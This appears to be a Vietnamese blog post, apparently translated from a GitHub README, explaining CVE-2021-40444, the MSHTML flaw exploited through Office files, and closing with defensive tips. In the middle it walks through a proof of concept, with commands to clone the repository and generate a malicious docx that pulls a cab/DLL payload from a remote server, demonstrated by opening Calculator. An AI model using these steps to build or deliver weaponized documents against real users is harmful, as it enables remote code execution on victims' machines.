PoC CVE-2021-40444 – Đính kèm Virus vào File Word
CVE-2021-40444 là mã lỗ hổng bảo mật mới nhất được sử dụng để tấn công Windows bằng file Word, Excel, PowerPoint. Tính đến thời điểm này, Microsoft chưa có bản vá cho Windows và chúng ta cần phải chờ đến bản vá lỗi định kỳ vào thứ 3 tuần tới. Tuy nhiên Defender vẫn có thể nhận diện được mã độc được đính kèm. HIện nay đã có Tool PoC CVE-2021-40444 giúp bạn thực nghiệm việc đính virus vào file văn bản gồm các sản phẩm của Microsoft nha CVE-2021-40444. Bài viết này chủ yếu dịch theo bài gốc của github vào mục đích nghiên cứu, vui lòng không lợi dụng để vi phạm pháp luật.
PoC CVE-2021-40444 là gì?
Mã CVE-2021-40444 không phải là một lỗ hổng Office hoàn toàn, vì việc khai thác tận dụng MSHTML web renderer (Internet Explorer) ActiveX control. Tuy không phải là một trình duyệt hoàn chỉnh nhưng nó là một “web engine” cốt lõi của Internet Explorer và có thể được sử dụng riêng để tạo các phiên trình duyệt hoặc ứng dụng giống như trình duyệt cần hoặc muốn hiển thị các tệp HTML.
Chính vì vậy, để khai thác CVE-2021-40444, kẻ tấn công chỉ cần DOCX, RTF hoặc bất kỳ tệp nào khác có thể trỏ đến OLE objects từ xa. Hiện vẫn chưa thấy có dấu hiệu khai thác lỗ hỏng nguy hiểm này từ các tin tặc ngoài việc chỉ thông qua Microsoft Office
Phần mềm tạo file docx độc hại để khai thác mã lỗi CVE-2021-40444 (Thực thi mã từ xa Microsoft Office Word).
Việc tạo Tập lệnh này dựa trên một số kỹ thuật đảo ngược đối với mẫu được sử dụng trong tự nhiên: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52
(tệp docx)
Bạn cần cài đặt lcab
trước ( sudo apt-get install lcab
)
Nếu file cab
đã tạo của bạn không hoạt động, hãy thử trỏ tới file URL trong explore.html tới calc.cab
Đính kèm mã độc vào file Word, Excel, PowerPoint
Công cụ này sẽ giúp bạn tạo ra một file Word độc hại, khi mở file , sẽ có một hàm trỏ tới test/calc.dll
dùng để mở chương trình máy tính Calculator của Windows lên.
Trước tiên chúng ta cần tải PoC CVE-2021-40444
git clone https://github.com/anonyvietofficial/CVE-2021-40444.git
python3 exploit.py generate test/calc.dll http://<SRV IP>
File word được đính kèm mã độc sẽ nằm trong thư mục out
, file cab độc hại nằm trong thư mục srv
. Bây giờ bạn có thể thiết lập Server
Thử mở file docx vừa được tạo trong máy ảo, chúng ta sẽ thấy File Word mở lên và chương trình máy tính Calculator cũng mở lên theo.
Làm sao ngăn chặn file Word độc hại CVE-2021-40444
Nếu bạn nhận file Word từ những nguồn đáng ngờ, trước tiên cần quét Virus từ các phần mềm chính hãng có bản quyền.
Nếu chỉ có nhu cầu đọc file, không có nhu cầu sửa file thì không nên bật chế độ Protected View “Enable Editing”.
Nếu bạn cần sửa file, tốt nhất là upload file lên Google Drive, sau đó dùng tính năng của Google Tài liệu để chỉnh sửa.